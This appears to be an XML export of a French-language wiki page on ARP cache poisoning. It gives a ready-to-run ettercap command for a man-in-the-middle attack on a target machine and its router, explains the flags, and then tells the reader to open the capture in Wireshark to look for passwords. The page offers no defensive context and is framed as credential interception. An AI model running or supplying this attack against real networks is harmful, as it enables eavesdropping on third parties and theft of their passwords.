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arp_cache_poisoning"/><text:bookmark-start text:name="__RefHeading___arp_cache_poisoning_1"/><text:bookmark-start text:name="arp_cache_poisoning"/>ARP Cache Poisoning<text:bookmark-end text:name="__RefHeading___arp_cache_poisoning_1"/><text:bookmark-end text:name="arp_cache_poisoning"/></text:h>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___arp_poisoning_basic_2"/><text:bookmark-start text:name="arp_poisoning_basic"/>ARP Poisoning Basic<text:bookmark-end text:name="__RefHeading___arp_poisoning_basic_2"/><text:bookmark-end text:name="arp_poisoning_basic"/></text:h>
      <text:p text:style-name="Text_20_body">Voici un exemple d'utilisation d'ettercap pour faire du ARP Poisoning (mettre sudo devant pour ubuntu) :</text:p>
      <text:p text:style-name="Preformatted_20_Text">ettercap -T -q -M arp:remote /192.168.1.101/ /192.168.1.1/ -w fichier_de_sortie</text:p>
      <text:list text:style-name="List_20_1" text:continue-numbering="false">
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_First"> -T : lance ettercap en mode texte</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> -q : permet de ne pas afficher les requêtes dans le terminal</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> -M : indique que l'on veut une attaque de type “Man in the middle”</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> -w : enregistre le résultat de la capture dans un fichier</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_Last"> 192.168.1.101 est la machine cible et 192.168.1.1 est le routeur de sortie</text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body">Ensuite on ouvre le fichier généré avec wireshark par exemple et on analyse à la recherche de mots de passe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0</meta:creation-date>
    <dc:creator>Generated</dc:creator>
    <dc:date>2026-05-06T16::09:20</dc:date>
    <dc:language>en-US</dc:language>
    <meta:editing-cycles>1</meta:editing-cycles>
    <meta:editing-duration>PT0S</meta:editing-duration>
    <dc:title>informatique:reseau:arp_cache_poisoning</dc:title>
  </office:meta>
</office:document-meta>
</file>